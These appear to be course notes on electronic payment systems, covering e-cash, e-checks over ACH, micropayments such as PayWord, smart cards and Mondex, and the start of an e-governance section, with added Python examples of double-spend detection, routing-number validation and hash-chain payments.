Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

- Issuers
- Customers
- Merchants or traders
- Regulators

Issuers can be banks or non-bank institutions. Customers are the users who spend E-Cash. Merchants and traders are vendors who receive E-Cash. Regulators are the related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

- Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts from various E-Cash issuers. Issuers typically handle accounting for customers and merchants.
- Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.
- Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system –

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.

This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works. The model is explained properly in the upcoming slides.

The customer approaches his issuer's (bank's) site for accessing his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds or as specified by the customer.

In the second phase, the customer will endorse those tokens to the merchant for acquiring services, for which the customer will authenticate the payment for the trader.

In the third phase, the trader will approach the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank will convert the tokens into electronic funds and the same will be transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another. Like the serial numbers on real currency notes, the E-cash numbers are unique. It is issued by a bank and represents a specified sum of real money. It is anonymous and reusable.

Electronic Cash Security

- Complex cryptographic algorithms prevent double spending
- Anonymity is preserved unless double spending is attempted
- Serial numbers can allow tracing to prevent money laundering
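The three-stage flow (issue tokens, spend them, redeem them with the issuer) and the double-spending point above can be seen in a small issuer-side ledger. This is an added example, not code from the original notes or from any real e-cash product: tokens carry a unique serial number and a denomination and are authenticated with an HMAC under a key that only the issuer holds, and a serial presented twice is refused. The HMAC stands in for the "complex cryptographic algorithms" the notes mention; real schemes use blind signatures so that the issuer cannot link a redeemed token to the customer who withdrew it, which this simplified version does not attempt. All names and amounts are constructed.

```python
# Added example (not from the original notes): issuer-side bookkeeping for
# serial-numbered e-cash tokens with double-spend detection.  HMAC is used
# as a simplified stand-in for the issuer's signature on each token.
import hashlib
import hmac
import secrets


class Issuer:
    """Bank that mints tokens, keeps balances and refuses reused serials."""

    def __init__(self):
        self._key = secrets.token_bytes(32)   # MAC key known only to the issuer
        self._spent = set()                    # serial numbers already redeemed
        self.accounts = {}                     # account name -> balance

    def open_account(self, name: str, balance: int = 0) -> None:
        self.accounts[name] = balance

    def _tag(self, serial: str, value: int) -> str:
        # Binds serial and denomination so neither can be altered by the holder.
        msg = f"{serial}:{value}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def withdraw(self, customer: str, denominations: list) -> list:
        """Account Setup / withdrawal: debit the customer, mint one token per value."""
        total = sum(denominations)
        if self.accounts.get(customer, 0) < total:
            raise ValueError("insufficient funds")
        self.accounts[customer] -= total
        tokens = []
        for value in denominations:
            serial = secrets.token_hex(8)      # unique, like a banknote serial
            tokens.append({"serial": serial, "value": value,
                           "tag": self._tag(serial, value)})
        return tokens

    def redeem(self, merchant: str, tokens: list):
        """Authentication stage: verify each token, reject forgeries and reuse."""
        accepted, rejected = 0, []
        for t in tokens:
            if not hmac.compare_digest(t["tag"], self._tag(t["serial"], t["value"])):
                rejected.append((t["serial"], "bad tag"))       # forged or altered
                continue
            if t["serial"] in self._spent:
                rejected.append((t["serial"], "double spend"))  # serial seen before
                continue
            self._spent.add(t["serial"])
            accepted += t["value"]
        self.accounts[merchant] = self.accounts.get(merchant, 0) + accepted
        return accepted, rejected


def demo() -> dict:
    bank = Issuer()
    bank.open_account("customer", 100)
    bank.open_account("merchant_a")
    bank.open_account("merchant_b")
    tokens = bank.withdraw("customer", [10, 10, 50])
    first, _ = bank.redeem("merchant_a", tokens[:2])                       # honest purchase
    replay, replay_rej = bank.redeem("merchant_b", [tokens[0], tokens[2]])  # token 0 reused
    forged = dict(tokens[2], value=500)                                     # denomination altered
    fake, fake_rej = bank.redeem("merchant_b", [forged])
    return {
        "first": first,
        "replay": replay,
        "replay_reason": replay_rej[0][1],
        "fake": fake,
        "fake_reason": fake_rej[0][1],
        "balances": dict(bank.accounts),
    }


if __name__ == "__main__":
    print(demo())
```

The replayed token is caught by the spent-serial set and the altered token by the tag check, and the merchant is credited only for tokens that pass both; the issuer's ledger, not the merchant, is the point where double spending is decided.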

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password or anything similar is involved. It is simply an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on the safe "https" protocol, and using proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

- We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.
- Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.
- E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges; that is why very low payments are not charged a fee.

Limitations

- However secure the e-cash payment system may be, no one is safe against online frauds. In this case the trader is the fraudulent party: the trader may take the amount but may not provide the services.
- While making the payment it is very important that the internet connection and power supply remain active. If the payment is in process and the internet connection fails in between, it can lead to loss of information, i.e. the amount will be charged but it will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.
- E-Cash is not for everyone. Low income segments without computer and internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown a tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.

E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.

Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business, and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize electronic debit and enter the bank routing number (ABA) and account number.
2. Merchant's sales system securely transfers order information to CyberSource over the Internet.
3. CyberSource forwards the bank routing number and account number to the processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.
5. CyberSource returns the approval/decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
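Step 4 above says the routing and account numbers are validated by the processor; part of that can be done locally before any network call. The following is an added example, not code from the original notes or from CyberSource: it applies the public ABA routing-number checksum (weights 3, 7, 1 repeated over the nine digits; the weighted sum must be divisible by 10) and a basic sanity check on the account number. A passing checksum only says the routing number is well-formed, not that the bank or account exists. The account-number length rule is an assumed check, and the sample numbers are constructed for the example.

```python
# Added example (not from the original notes): local validation of the
# payer-entered routing number before the request goes to the processor.
# The ABA checksum rule is public; the account-number rule is an assumed
# sanity check only.  Sample values are constructed for this example.

ABA_WEIGHTS = (3, 7, 1, 3, 7, 1, 3, 7, 1)


def routing_number_checksum_ok(routing: str) -> bool:
    """True if `routing` is nine digits whose weighted sum is a multiple of 10."""
    digits = routing.strip()
    if len(digits) != 9 or not digits.isdigit():
        return False
    total = sum(int(d) * w for d, w in zip(digits, ABA_WEIGHTS))
    return total % 10 == 0


def validate_debit_request(routing: str, account: str) -> dict:
    """Structured result for the routing/account pair a payer typed in.

    The account-number rule (digits only, 4 to 17 characters; 17 is the width
    of the ACH account-number field) is an assumed first check.  Whether the
    account is real and has funds is decided by the processor, not here.
    """
    problems = []
    if not routing_number_checksum_ok(routing):
        problems.append("routing number fails ABA checksum")
    acct = account.strip()
    if not acct.isdigit() or not (4 <= len(acct) <= 17):
        problems.append("account number must be 4 to 17 digits")
    return {"ok": not problems, "problems": problems}


if __name__ == "__main__":
    # Constructed samples: the first satisfies the checksum, the others do not.
    for r in ("011000015", "011000016", "12345678"):
        print(r, routing_number_checksum_ok(r))
    print(validate_debit_request("011000015", "000123456789"))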

Four Different Scenarios of the FSTC E-check System –

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples:

- Millicent (pre-payment/credit based)
- Paywords (post-payment)

MICRO PAYMENT IS –

- Very small payments made over the Web
- Transactions too small for credit cards
- Can be as little as a fraction of a cent
- Alternative to subscription and advertising
- Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.
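The PayWord scheme listed earlier under the micropayment methods is one concrete way to get the "accumulate, then collect as a single larger payment" behaviour described in the scheme above. The following is an added example, not code from the original notes and not the PayWord authors' code; it goes beyond what the text shows by working the mechanism through: the payer commits to the root of a hash chain, each payment reveals the next preimage, the vendor checks it with hashing alone, and at the end the vendor presents one aggregate claim that the broker (the third-party provider) can verify against the commitment. The signed commitment certificate of real PayWord is omitted, and all names and amounts are constructed.

```python
# Added example (not from the original notes): a PayWord-style hash-chain
# micropayment between a payer, a vendor and a broker.  Real PayWord signs
# the commitment with the payer's certificate; that step is omitted here.
import hashlib
import secrets


def H(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


class Payer:
    """Builds a hash chain once and reveals paywords as it spends."""

    def __init__(self, chain_length: int, unit_cents: int):
        self.n = chain_length
        self.unit = unit_cents
        seed = secrets.token_bytes(32)
        chain = [seed]
        for _ in range(chain_length):
            chain.append(H(chain[-1]))
        # words[0] = H^n(seed) is the public root; words[n] = seed.
        # For every i >= 1, H(words[i]) == words[i-1].
        self.words = chain[::-1]
        self.spent = 0

    def commitment(self):
        return self.words[0], self.unit

    def pay(self, units: int):
        """Spend `units` paywords; returns (index, word) for the vendor."""
        if self.spent + units > self.n:
            raise ValueError("chain exhausted")
        self.spent += units
        return self.spent, self.words[self.spent]


class Vendor:
    """Verifies each payment with hashing only and accumulates the total."""

    def __init__(self):
        self.sessions = {}   # payer id -> [last index, last word, unit]

    def register(self, payer_id: str, root: bytes, unit: int) -> None:
        self.sessions[payer_id] = [0, root, unit]

    def accept(self, payer_id: str, index: int, word: bytes) -> bool:
        last_i, last_w, unit = self.sessions[payer_id]
        if index <= last_i:
            return False                  # replayed or out-of-order payword
        h = word
        for _ in range(index - last_i):   # hash forward to the last accepted word
            h = H(h)
        if h != last_w:
            return False                  # not on the committed chain
        self.sessions[payer_id] = [index, word, unit]
        return True

    def claim(self, payer_id: str) -> dict:
        """One aggregate settlement record for the broker, not one per payment."""
        index, word, unit = self.sessions[payer_id]
        return {"payer": payer_id, "units": index, "word": word, "cents": index * unit}


def broker_verify(root: bytes, claim: dict) -> bool:
    """Broker checks the claim against the commitment: H^units(word) == root."""
    h = claim["word"]
    for _ in range(claim["units"]):
        h = H(h)
    return h == root


def demo() -> dict:
    payer = Payer(chain_length=100, unit_cents=5)
    vendor = Vendor()
    root, unit = payer.commitment()
    vendor.register("alice", root, unit)
    ok1 = vendor.accept("alice", *payer.pay(1))                    # 5 cents
    ok2 = vendor.accept("alice", *payer.pay(3))                    # 15 cents more
    replay = vendor.accept("alice", 4, payer.words[4])             # same word again
    forged = vendor.accept("alice", 10, secrets.token_bytes(32))   # not on the chain
    claim = vendor.claim("alice")
    return {"ok1": ok1, "ok2": ok2, "replay": replay, "forged": forged,
            "cents": claim["cents"], "broker_ok": broker_verify(root, claim)}


if __name__ == "__main__":
    print(demo())
```

Each payment costs the vendor one or a few hash computations and no signature check, which is what makes per-click amounts of a few cents workable, and the broker settles a single claim whose size is proven by the chain rather than by a receipt for every payment.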

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits on the customer side in using micropayments are speed and flexibility. On the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore, the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

- Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.
- Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.
- Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.
- Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by VISA and MasterCard SecureCode).
- Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –

- Publishing
- Marketing
- Software
- Entertainment
- Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing[2]. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized, with a microchip embedded on it

Two types:

Memory-only chips

Microprocessor chips

Can hold up to 32,000 bytes

Newer smart cards have math co-processors


Perform complex encryption routines quickly

In 1968 German inventors patented the combination of plastic cards with microchips.

Construction of Smart Cards –


Why Smart Cards –

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages –

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications –

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and “lock card” functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

CONSUMER –

Convenience

Accessibility

On-chip record of recent transactions

Home load

Internet purchases

MERCHANT –

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION –

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia-Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected:

o Limits for collecting personal information

o limits for using, disclosing and keeping personal information

o keeping personal information accurate

o safeguarding personal information


Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in MULTOS between applications (ITSEC 6 designation)

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks – Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card’s microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren’t truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can’t purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you’re protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can’t claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
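The overflow described above, modelled as an added example (not Mondex's own code, log format or figures beyond the "rolling 10 transactions" stated earlier): a card keeps a fixed-size record log, loads are ledgered online by the bank, and an audit reconciles the bank's load ledger with whatever offline records still survive on the card. Card ids, amounts and the 5000-unit load are constructed values.

```python
from collections import deque
from dataclasses import dataclass, field

# The page states the card keeps a "rolling 10 transactions" record.
LOG_CAPACITY = 10


@dataclass
class TxRecord:
    seq: int            # card-local sequence number, never reused
    kind: str           # "load" (online, from bank) | "pay" | "receive"
    amount: int         # value in the smallest currency unit
    counterparty: str   # bank id or the other card's id


@dataclass
class MondexCard:
    card_id: str
    balance: int = 0
    seq: int = 0
    # Fixed-size ring buffer: once full, each append evicts the oldest record.
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_CAPACITY))

    def _record(self, kind: str, amount: int, counterparty: str) -> None:
        self.seq += 1
        self.log.append(TxRecord(self.seq, kind, amount, counterparty))

    def load(self, amount: int, bank_id: str = "BANK") -> int:
        """Online load: the bank sees and ledgers this, so it stays auditable."""
        if amount <= 0:
            raise ValueError("load amount must be positive")
        self.balance += amount
        self._record("load", amount, bank_id)
        return amount

    def transfer(self, other: "MondexCard", amount: int) -> None:
        """Offline card-to-card transfer: only the two cards record it."""
        if amount <= 0 or amount > self.balance:
            raise ValueError("invalid transfer amount")
        self.balance -= amount
        other.balance += amount
        self._record("pay", amount, other.card_id)
        other._record("receive", amount, self.card_id)


def lost_records(card: MondexCard) -> int:
    """Records that were generated but have overflowed out of the card log."""
    return max(0, card.seq - len(card.log))


def audit(card: MondexCard, bank_loads: int) -> dict:
    """Reconstruct the balance the bank can justify and compare it with the
    balance the card reports. bank_loads is the bank's own online ledger of
    loads; offline pay/receive entries exist only in the card log."""
    received = sum(r.amount for r in card.log if r.kind == "receive")
    paid = sum(r.amount for r in card.log if r.kind == "pay")
    reconstructed = bank_loads + received - paid
    return {
        "card_balance": card.balance,
        "reconstructed_balance": reconstructed,
        # positive: value left the card in transactions no longer on record
        "unexplained_gap": reconstructed - card.balance,
        "lost_records": lost_records(card),
    }


def simulate(n_payments: int, payment: int = 100) -> dict:
    """Constructed scenario: one online load, then n offline payments."""
    alice = MondexCard("CARD-A")
    shop = MondexCard("CARD-SHOP")
    bank_loads = alice.load(5000)
    for _ in range(n_payments):
        alice.transfer(shop, payment)
    return audit(alice, bank_loads)


if __name__ == "__main__":
    print(simulate(5))    # all 6 records fit: gap 0, lost_records 0
    print(simulate(15))   # 16 records, 10 kept: gap 500, lost_records 6
```

Once more records are generated than the log holds, the audit can no longer explain part of the balance change, which is exactly the fraud-detection weakness the critics point to.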

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term ‘e-Governance’ has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term ‘e-government’ is also used instead of ‘e-Governance’.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word “electronic” in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration – combined with organizational change and new skills – to improve public services and democratic processes and to strengthen support to the public. The problem with treating this definition as congruent with a definition of e-governance is that it makes no provision for the governance of the ICTs themselves. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is a location transparent, language independent, implementation independent and Operating System independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

